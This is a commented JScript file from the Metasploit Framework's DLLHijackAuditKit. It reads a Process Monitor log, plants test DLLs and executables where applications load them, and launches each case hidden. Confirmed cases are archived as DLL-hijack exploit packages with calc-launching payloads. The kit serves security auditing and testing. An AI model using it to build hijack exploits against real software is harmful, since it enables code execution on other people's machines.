GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/DLLHijackAuditKit/analyze.js
/* DLLHijackAuditKit (C) 2010 Rapid7, Inc */
// Script-host COM handles shared by every function below: the filesystem
// object (file/folder copies and creation), the shell (Run and CurrentDirectory)
// and the directory the script was started from, forced to a JScript string.
var oFso = new ActiveXObject("Scripting.FileSystemObject");
var oShl = new ActiveXObject("WScript.Shell");
var oCWD = "" + oShl.CurrentDirectory;
// Writes `msg` to the script host's stdout, prefixed with "[*] ".
// Any failure to build or write the line (no console attached, no
// WScript host, an argument that cannot be stringified) is ignored.
function print_status(msg) {
    try {
        var out = "[*] " + msg;
        WScript.StdOut.WriteLine(out);
    } catch (ignored) {
    }
}
// Returns an array holding the ProcessId of every process that WMI
// (root\CIMV2, Win32_Process) reports, except those whose ExecutablePath
// contains "taskmgr". That exclusion is what keeps Task Manager out of the
// "new process" set that the main loop force-kills after each test case.
// Needs the script-host globals GetObject and Enumerator.
function process_list() {
    var wbemFlagReturnImmediately = 0x10;
    var wbemFlagForwardOnly = 0x20;
    var pids = [];
    var svc = GetObject("winmgmts:\\\\localhost\\root\\CIMV2");
    var query = svc.ExecQuery("SELECT * FROM Win32_Process", "WQL", wbemFlagReturnImmediately | wbemFlagForwardOnly);
    var it = new Enumerator(query);
    while (!it.atEnd()) {
        var proc = it.item();
        var exe = proc.ExecutablePath;
        var isTaskMgr = exe && exe.toLowerCase().indexOf("taskmgr") != -1;
        if (!isTaskMgr) {
            pids.push(proc.ProcessId);
        }
        it.moveNext();
    }
    return pids;
}
/* Recursively overwrite every file below `dir` (its files first, then each
   sub-folder) with the runcalc.* binaries located in `src`, skipping any file
   whose name contains "exploit.": a name containing ".exe" receives
   src\runcalc.exe, every other name receives src\runcalc.dll. Each copy is
   attempted on its own and failures are silently ignored. The main loop calls
   this on the copy of a confirmed test case under Exploits\, so the archived
   case no longer contains the runtest.* binaries used during detection. */
function replace_payloads(dir, src) {
    var base = oFso.GetFolder(dir);
    var files = new Enumerator(base.files);
    for (; !files.atEnd(); files.moveNext()) {
        // File name only, lower-cased; the destination is rebuilt as dir + name.
        var entry = files.item().Name.toString().toLowerCase();
        if ( entry.indexOf("exploit.") == -1) {
            // Substring match: a name such as "x.exe.dll" also takes the .exe branch.
            if (entry.toString().indexOf(".exe") != -1) {
                try { oFso.CopyFile(src + "\\runcalc.exe", dir + "\\" + entry); } catch(e) { }
            } else {
                try { oFso.CopyFile(src + "\\runcalc.dll", dir + "\\" + entry); } catch(e) { }
            }
        }
    }

    // Recurse into each sub-folder. Stringifying the Folder item yields its
    // path (the object's default property), which becomes the new `dir`.
    var subs = new Enumerator(base.SubFolders);
    for (; !subs.atEnd(); subs.moveNext()) {
        var entry = (subs.item() + "").toLowerCase();
        replace_payloads(entry, src);
    }
}
/* Process Logfile.CSV
52
a) Make a list of applications and their associated DLLs
53
b) Create a test case for each extension and each DLL
54
c) Run each test case and look for "exploited.txt"
55
d) Copy confirmed test cases to a new directory
56
*/
// Logfile.CSV is the load-event log to analyze (presumably a Process Monitor
// export: the header scan below looks for "Process Name" and "Path" columns).
// Nothing is attempted without it.
if (! oFso.FileExists("Logfile.CSV")) {
    print_status("Please save Logfile.CSV to the current directory first");
    WScript.Quit();
}

// Baseline snapshot of every PID on the machine, taken once. Each test case
// below is judged by whether the process count grows past this, and any PID
// NOT in this list is force-killed afterwards — whether or not the test case
// is what spawned it.
var procs = process_list();
print_status("Protecting " + procs.length + " processes");

// apps[app][ext][relativeDllPath] = true. Arrays are used as associative maps
// here, so all iteration over them happens via for..in below.
var apps = new Array();
var fCSV = oFso.OpenTextFile("Logfile.CSV");
var line = fCSV.ReadLine();
var iPath = 4;    // column index of the path field if no header matches
var iProc = 1;    // column index of the process-name field if no header matches
var bits = line.split(",");

// Determine which column holds the process name and which the path.
// Both are substring matches and the loop does not stop at the first hit,
// so the LAST header containing "path" wins.
for (var i=0; i < bits.length; i++) {
    if (bits[i].toLowerCase().indexOf("process name") != -1) {
        iProc = i;
    }
    if (bits[i].toLowerCase().indexOf("path") != -1) {
        iPath = i;
    }
}

// Parse the CSV into a map of each application's loads.
// Each row's `",` separators are swapped for a "||||" sentinel, all quotes are
// stripped and the line is split on the sentinel — so a quoted field that
// itself contains `",` is mis-split. A row with fewer columns than iProc/iPath
// leaves bits[...] undefined, and the .toLowerCase() call throws and aborts
// the script.
while( ! fCSV.AtEndOfStream ) {
    line = fCSV.ReadLine();
    bits = line.replace(/\",/g, "\"||||").replace(/"/g, '').split("||||");

    var vApp = bits[iProc].toLowerCase();
    var vPath = bits[iPath].toLowerCase();
    // Everything up to and including "DLLAudit\ext\" is dropped; the first
    // remaining segment is the extension folder and the rest (vTgt after the
    // shift) is the DLL path relative to it. A path without that marker is
    // left untouched, so its first segment (e.g. a drive letter) becomes vExt.
    var vExt = vPath.replace(/.*DLLAudit\\ext\\/ig, '').split("\\")[0].toLowerCase();
    var vTgt = vPath.replace(/.*DLLAudit\\ext\\/ig, '').split("\\");
    vTgt.shift();

    var vDll = vTgt.join("\\").toLowerCase();

    if (! apps[vApp]) apps[vApp] = new Array();
    if (! apps[vApp][vExt]) apps[vApp][vExt] = new Array();
    apps[vApp][vExt][vDll] = true;
}


print_status("Generating and validating test cases...");
try { oFso.CreateFolder(oCWD + "\\TestCases"); } catch(e) { }
try { oFso.CreateFolder(oCWD + "\\Exploits"); } catch(e) { }

// Layout produced: TestCases\<app>\<ext>\<dllname>\[<subdirs>\]<dllname>, with
// runtest.* at the innermost path and exploit.<ext> directly under <dllname>.
// Every CreateFolder failure (typically "already exists") is ignored.
for (var tApp in apps) {
    print_status(" Application: " + tApp);

    var aBase = oCWD + "\\TestCases\\" + tApp;
    try { oFso.CreateFolder(aBase); } catch(e) { }

    for (var tExt in apps[tApp]) {
        var eBase = aBase + "\\" + tExt;
        // Basenames already confirmed for this app/extension pair. Reset per
        // extension, so the same basename is tested again under the next one.
        var aExploited = new Array();

        try { oFso.CreateFolder(eBase); } catch(e) { }
        for (var tDll in apps[tApp][tExt]) {
            var tBits = tDll.split("\\");    // after the pop(): sub-directory segments only
            var tName = tBits.pop();         // the DLL/EXE file name itself
            var dBase = eBase + "\\" + tName;
            try { oFso.CreateFolder(dBase); } catch(e) { }

            // A basename confirmed once under this extension is not retried,
            // even if it appears again under a different sub-directory.
            if (aExploited[tName]) continue;

            // tDll may be a subdirectory + DLL: recreate the directory chain
            // under dBase. NOTE(review): tPath is assigned without `var` and
            // therefore becomes an implicit global.
            tPath = dBase;
            for (var y = 0; y < tBits.length; y++) {
                tPath = tPath + "\\" + tBits[y];
                try { oFso.CreateFolder(tPath); } catch(e) { }
            }
            tPath = tPath + "\\" + tName;

            // Place runtest.exe / runtest.dll from the working directory at the
            // path the application was logged loading from. ".exe" is a
            // substring match, so "x.exe.dll" would also receive runtest.exe.
            try {
                if (tName.toLowerCase().indexOf(".exe") != -1) {
                    oFso.CopyFile(oCWD + "\\runtest.exe", tPath);
                } else {
                    oFso.CopyFile(oCWD + "\\runtest.dll", tPath);
                }
            } catch(e) { }

            // Create the actual test case file: a document with this extension
            // and placeholder content, opened below through its file association.
            try {
                var a = oFso.CreateTextFile(dBase + "\\exploit." + tExt);
                a.WriteLine("HOWDY!");
                a.Close();
            } catch(e) { }


            try {
                // Run the test case with a hidden window (second Run argument 0)
                // without waiting for it. tExt comes straight from the CSV and
                // is interpolated unquoted into the cmd.exe command line.
                oShl.CurrentDirectory = dBase;
                oShl.Run("cmd.exe /c start exploit." + tExt, 0);
            } catch(e) { }
            WScript.Sleep(500);

            // Poll up to three times, 0.5 s apart, until the process count
            // differs from the baseline. Only the count is compared: one
            // process exiting while another starts reads as "nothing happened".
            var nprocs = process_list();
            var cnt = 0;
            while(nprocs.length == procs.length && cnt < 2) {
                cnt++;
                WScript.Sleep(500);
                nprocs = process_list();
            }

            // If an application spawned, give it three seconds
            // This helps with ProcMon memory usage as well
            if (nprocs.length > procs.length) {
                WScript.Sleep(3000);
            }

            // Force-kill every PID present now but absent from the startup
            // baseline (nested linear scan). With no new PIDs the command is
            // just "taskkill /F ", which taskkill should reject; Run waits for
            // it (third argument true) and its return value is not checked.
            var killer = "taskkill /F ";
            for (var i=0; i < nprocs.length; i++) {
                var found = false;
                for (var x=0; x < procs.length; x++) {
                    if (nprocs[i] == procs[x]) {
                        found = true;
                        break;
                    }
                }
                if (found) continue;
                killer = killer + "/PID " + nprocs[i] + " ";
            }
            oShl.Run(killer, 0, true);

            // Check for the file existence: exploited.txt is the success marker
            // (presumably written by runtest.* when it gets loaded — those
            // binaries are not part of this script, so confirm against them).
            if (oFso.FileExists(dBase + "\\exploited.txt")) {

                print_status("Successfully exploited " + tApp + " with ." + tExt + " using " + tName);
                aExploited[tName] = true;
                // Archive the confirmed case as Exploits\<app>_<ext>_<dll>:
                // CopyFolder takes the sub-directories and CopyFile the top-level
                // files (both with overwrite = true), the marker file is removed,
                // and replace_payloads swaps the runtest.* binaries for runcalc.*.
                var xBase = oCWD + "\\Exploits\\" + tApp + "_" + tExt + "_" + tName;
                try { oFso.CreateFolder(xBase); } catch(e) { }
                try { oFso.CopyFolder(dBase + "\\*.*", xBase + "\\", true); } catch(e) { }
                try { oFso.CopyFile(dBase + "\\*.*", xBase + "\\", true); } catch(e) { }
                try { oFso.DeleteFile(xBase + "\\exploited.txt"); } catch(e) { }
                replace_payloads(xBase, oCWD);
            }

        }

    }
}